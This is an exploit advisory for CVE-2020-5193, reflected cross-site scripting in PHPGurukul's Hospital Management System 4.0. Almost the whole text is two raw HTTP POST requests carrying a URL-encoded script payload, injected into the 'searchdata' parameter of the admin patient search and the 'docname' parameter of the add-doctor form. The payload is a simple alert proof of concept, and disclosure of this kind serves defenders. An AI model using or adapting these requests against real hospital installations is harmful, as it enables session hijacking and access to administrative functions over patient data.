> # Exploit Title: Hospital Management System 4.0 Multiple Reflected XSS
> # Google Dork: N/A
> # Date: 1/2/2020
> # Exploit Author: FULLSHADE
> # Vendor Homepage: https://phpgurukul.com/
> # Software Link: https://phpgurukul.com/hospital-management-system-in-php/
> # Version: v4.0
> # Tested on: Windows
> # CVE : CVE-2020-5193
>
> ================ 1 - Cross Site Scripting (Reflected) ================
>
> POST /hospital/hospital/hms/admin/patient-search.php HTTP/1.1
> Host: 10.0.0.214
> User-Agent: Mozilla/5.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 74
> Origin: http://10.0.0.214
> DNT: 1
> Connection: close
> Referer: http://10.0.0.214/hospital/hospital/hms/admin/patient-search.php
> Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
> Upgrade-Insecure-Requests: 1
>
> searchdata=%3Cscript%3Ealert%28%22xss+machine%22%29%3C%2Fscript%3E&search=
>
> ?searchdata parameter is vulnerable to reflected XSS in the search field
>
> ================ 2 - Cross Site Scripting (Reflected) ================
>
> POST /hospital/hospital/hms/admin/add-doctor.php HTTP/1.1
> Host: 10.0.0.214
> User-Agent: Mozilla/5.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 187
> Origin: http://10.0.0.214
> DNT: 1
> Connection: close
> Referer: http://10.0.0.214/hospital/hospital/hms/admin/add-doctor.php
> Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
> Upgrade-Insecure-Requests: 1
>
> Doctorspecialization=123&docname=%3Cscript%3Ealert%28%22xss+machine%22%29%3C%2Fscript%3E&clinicaddress=123&docfees=123&doccontact=123&docemail=123%40gmail.com&npass=123&cfpass=123&submit=
>
> ?docname parameter is vulnerable to refleced XSS when managing and adding a new doctor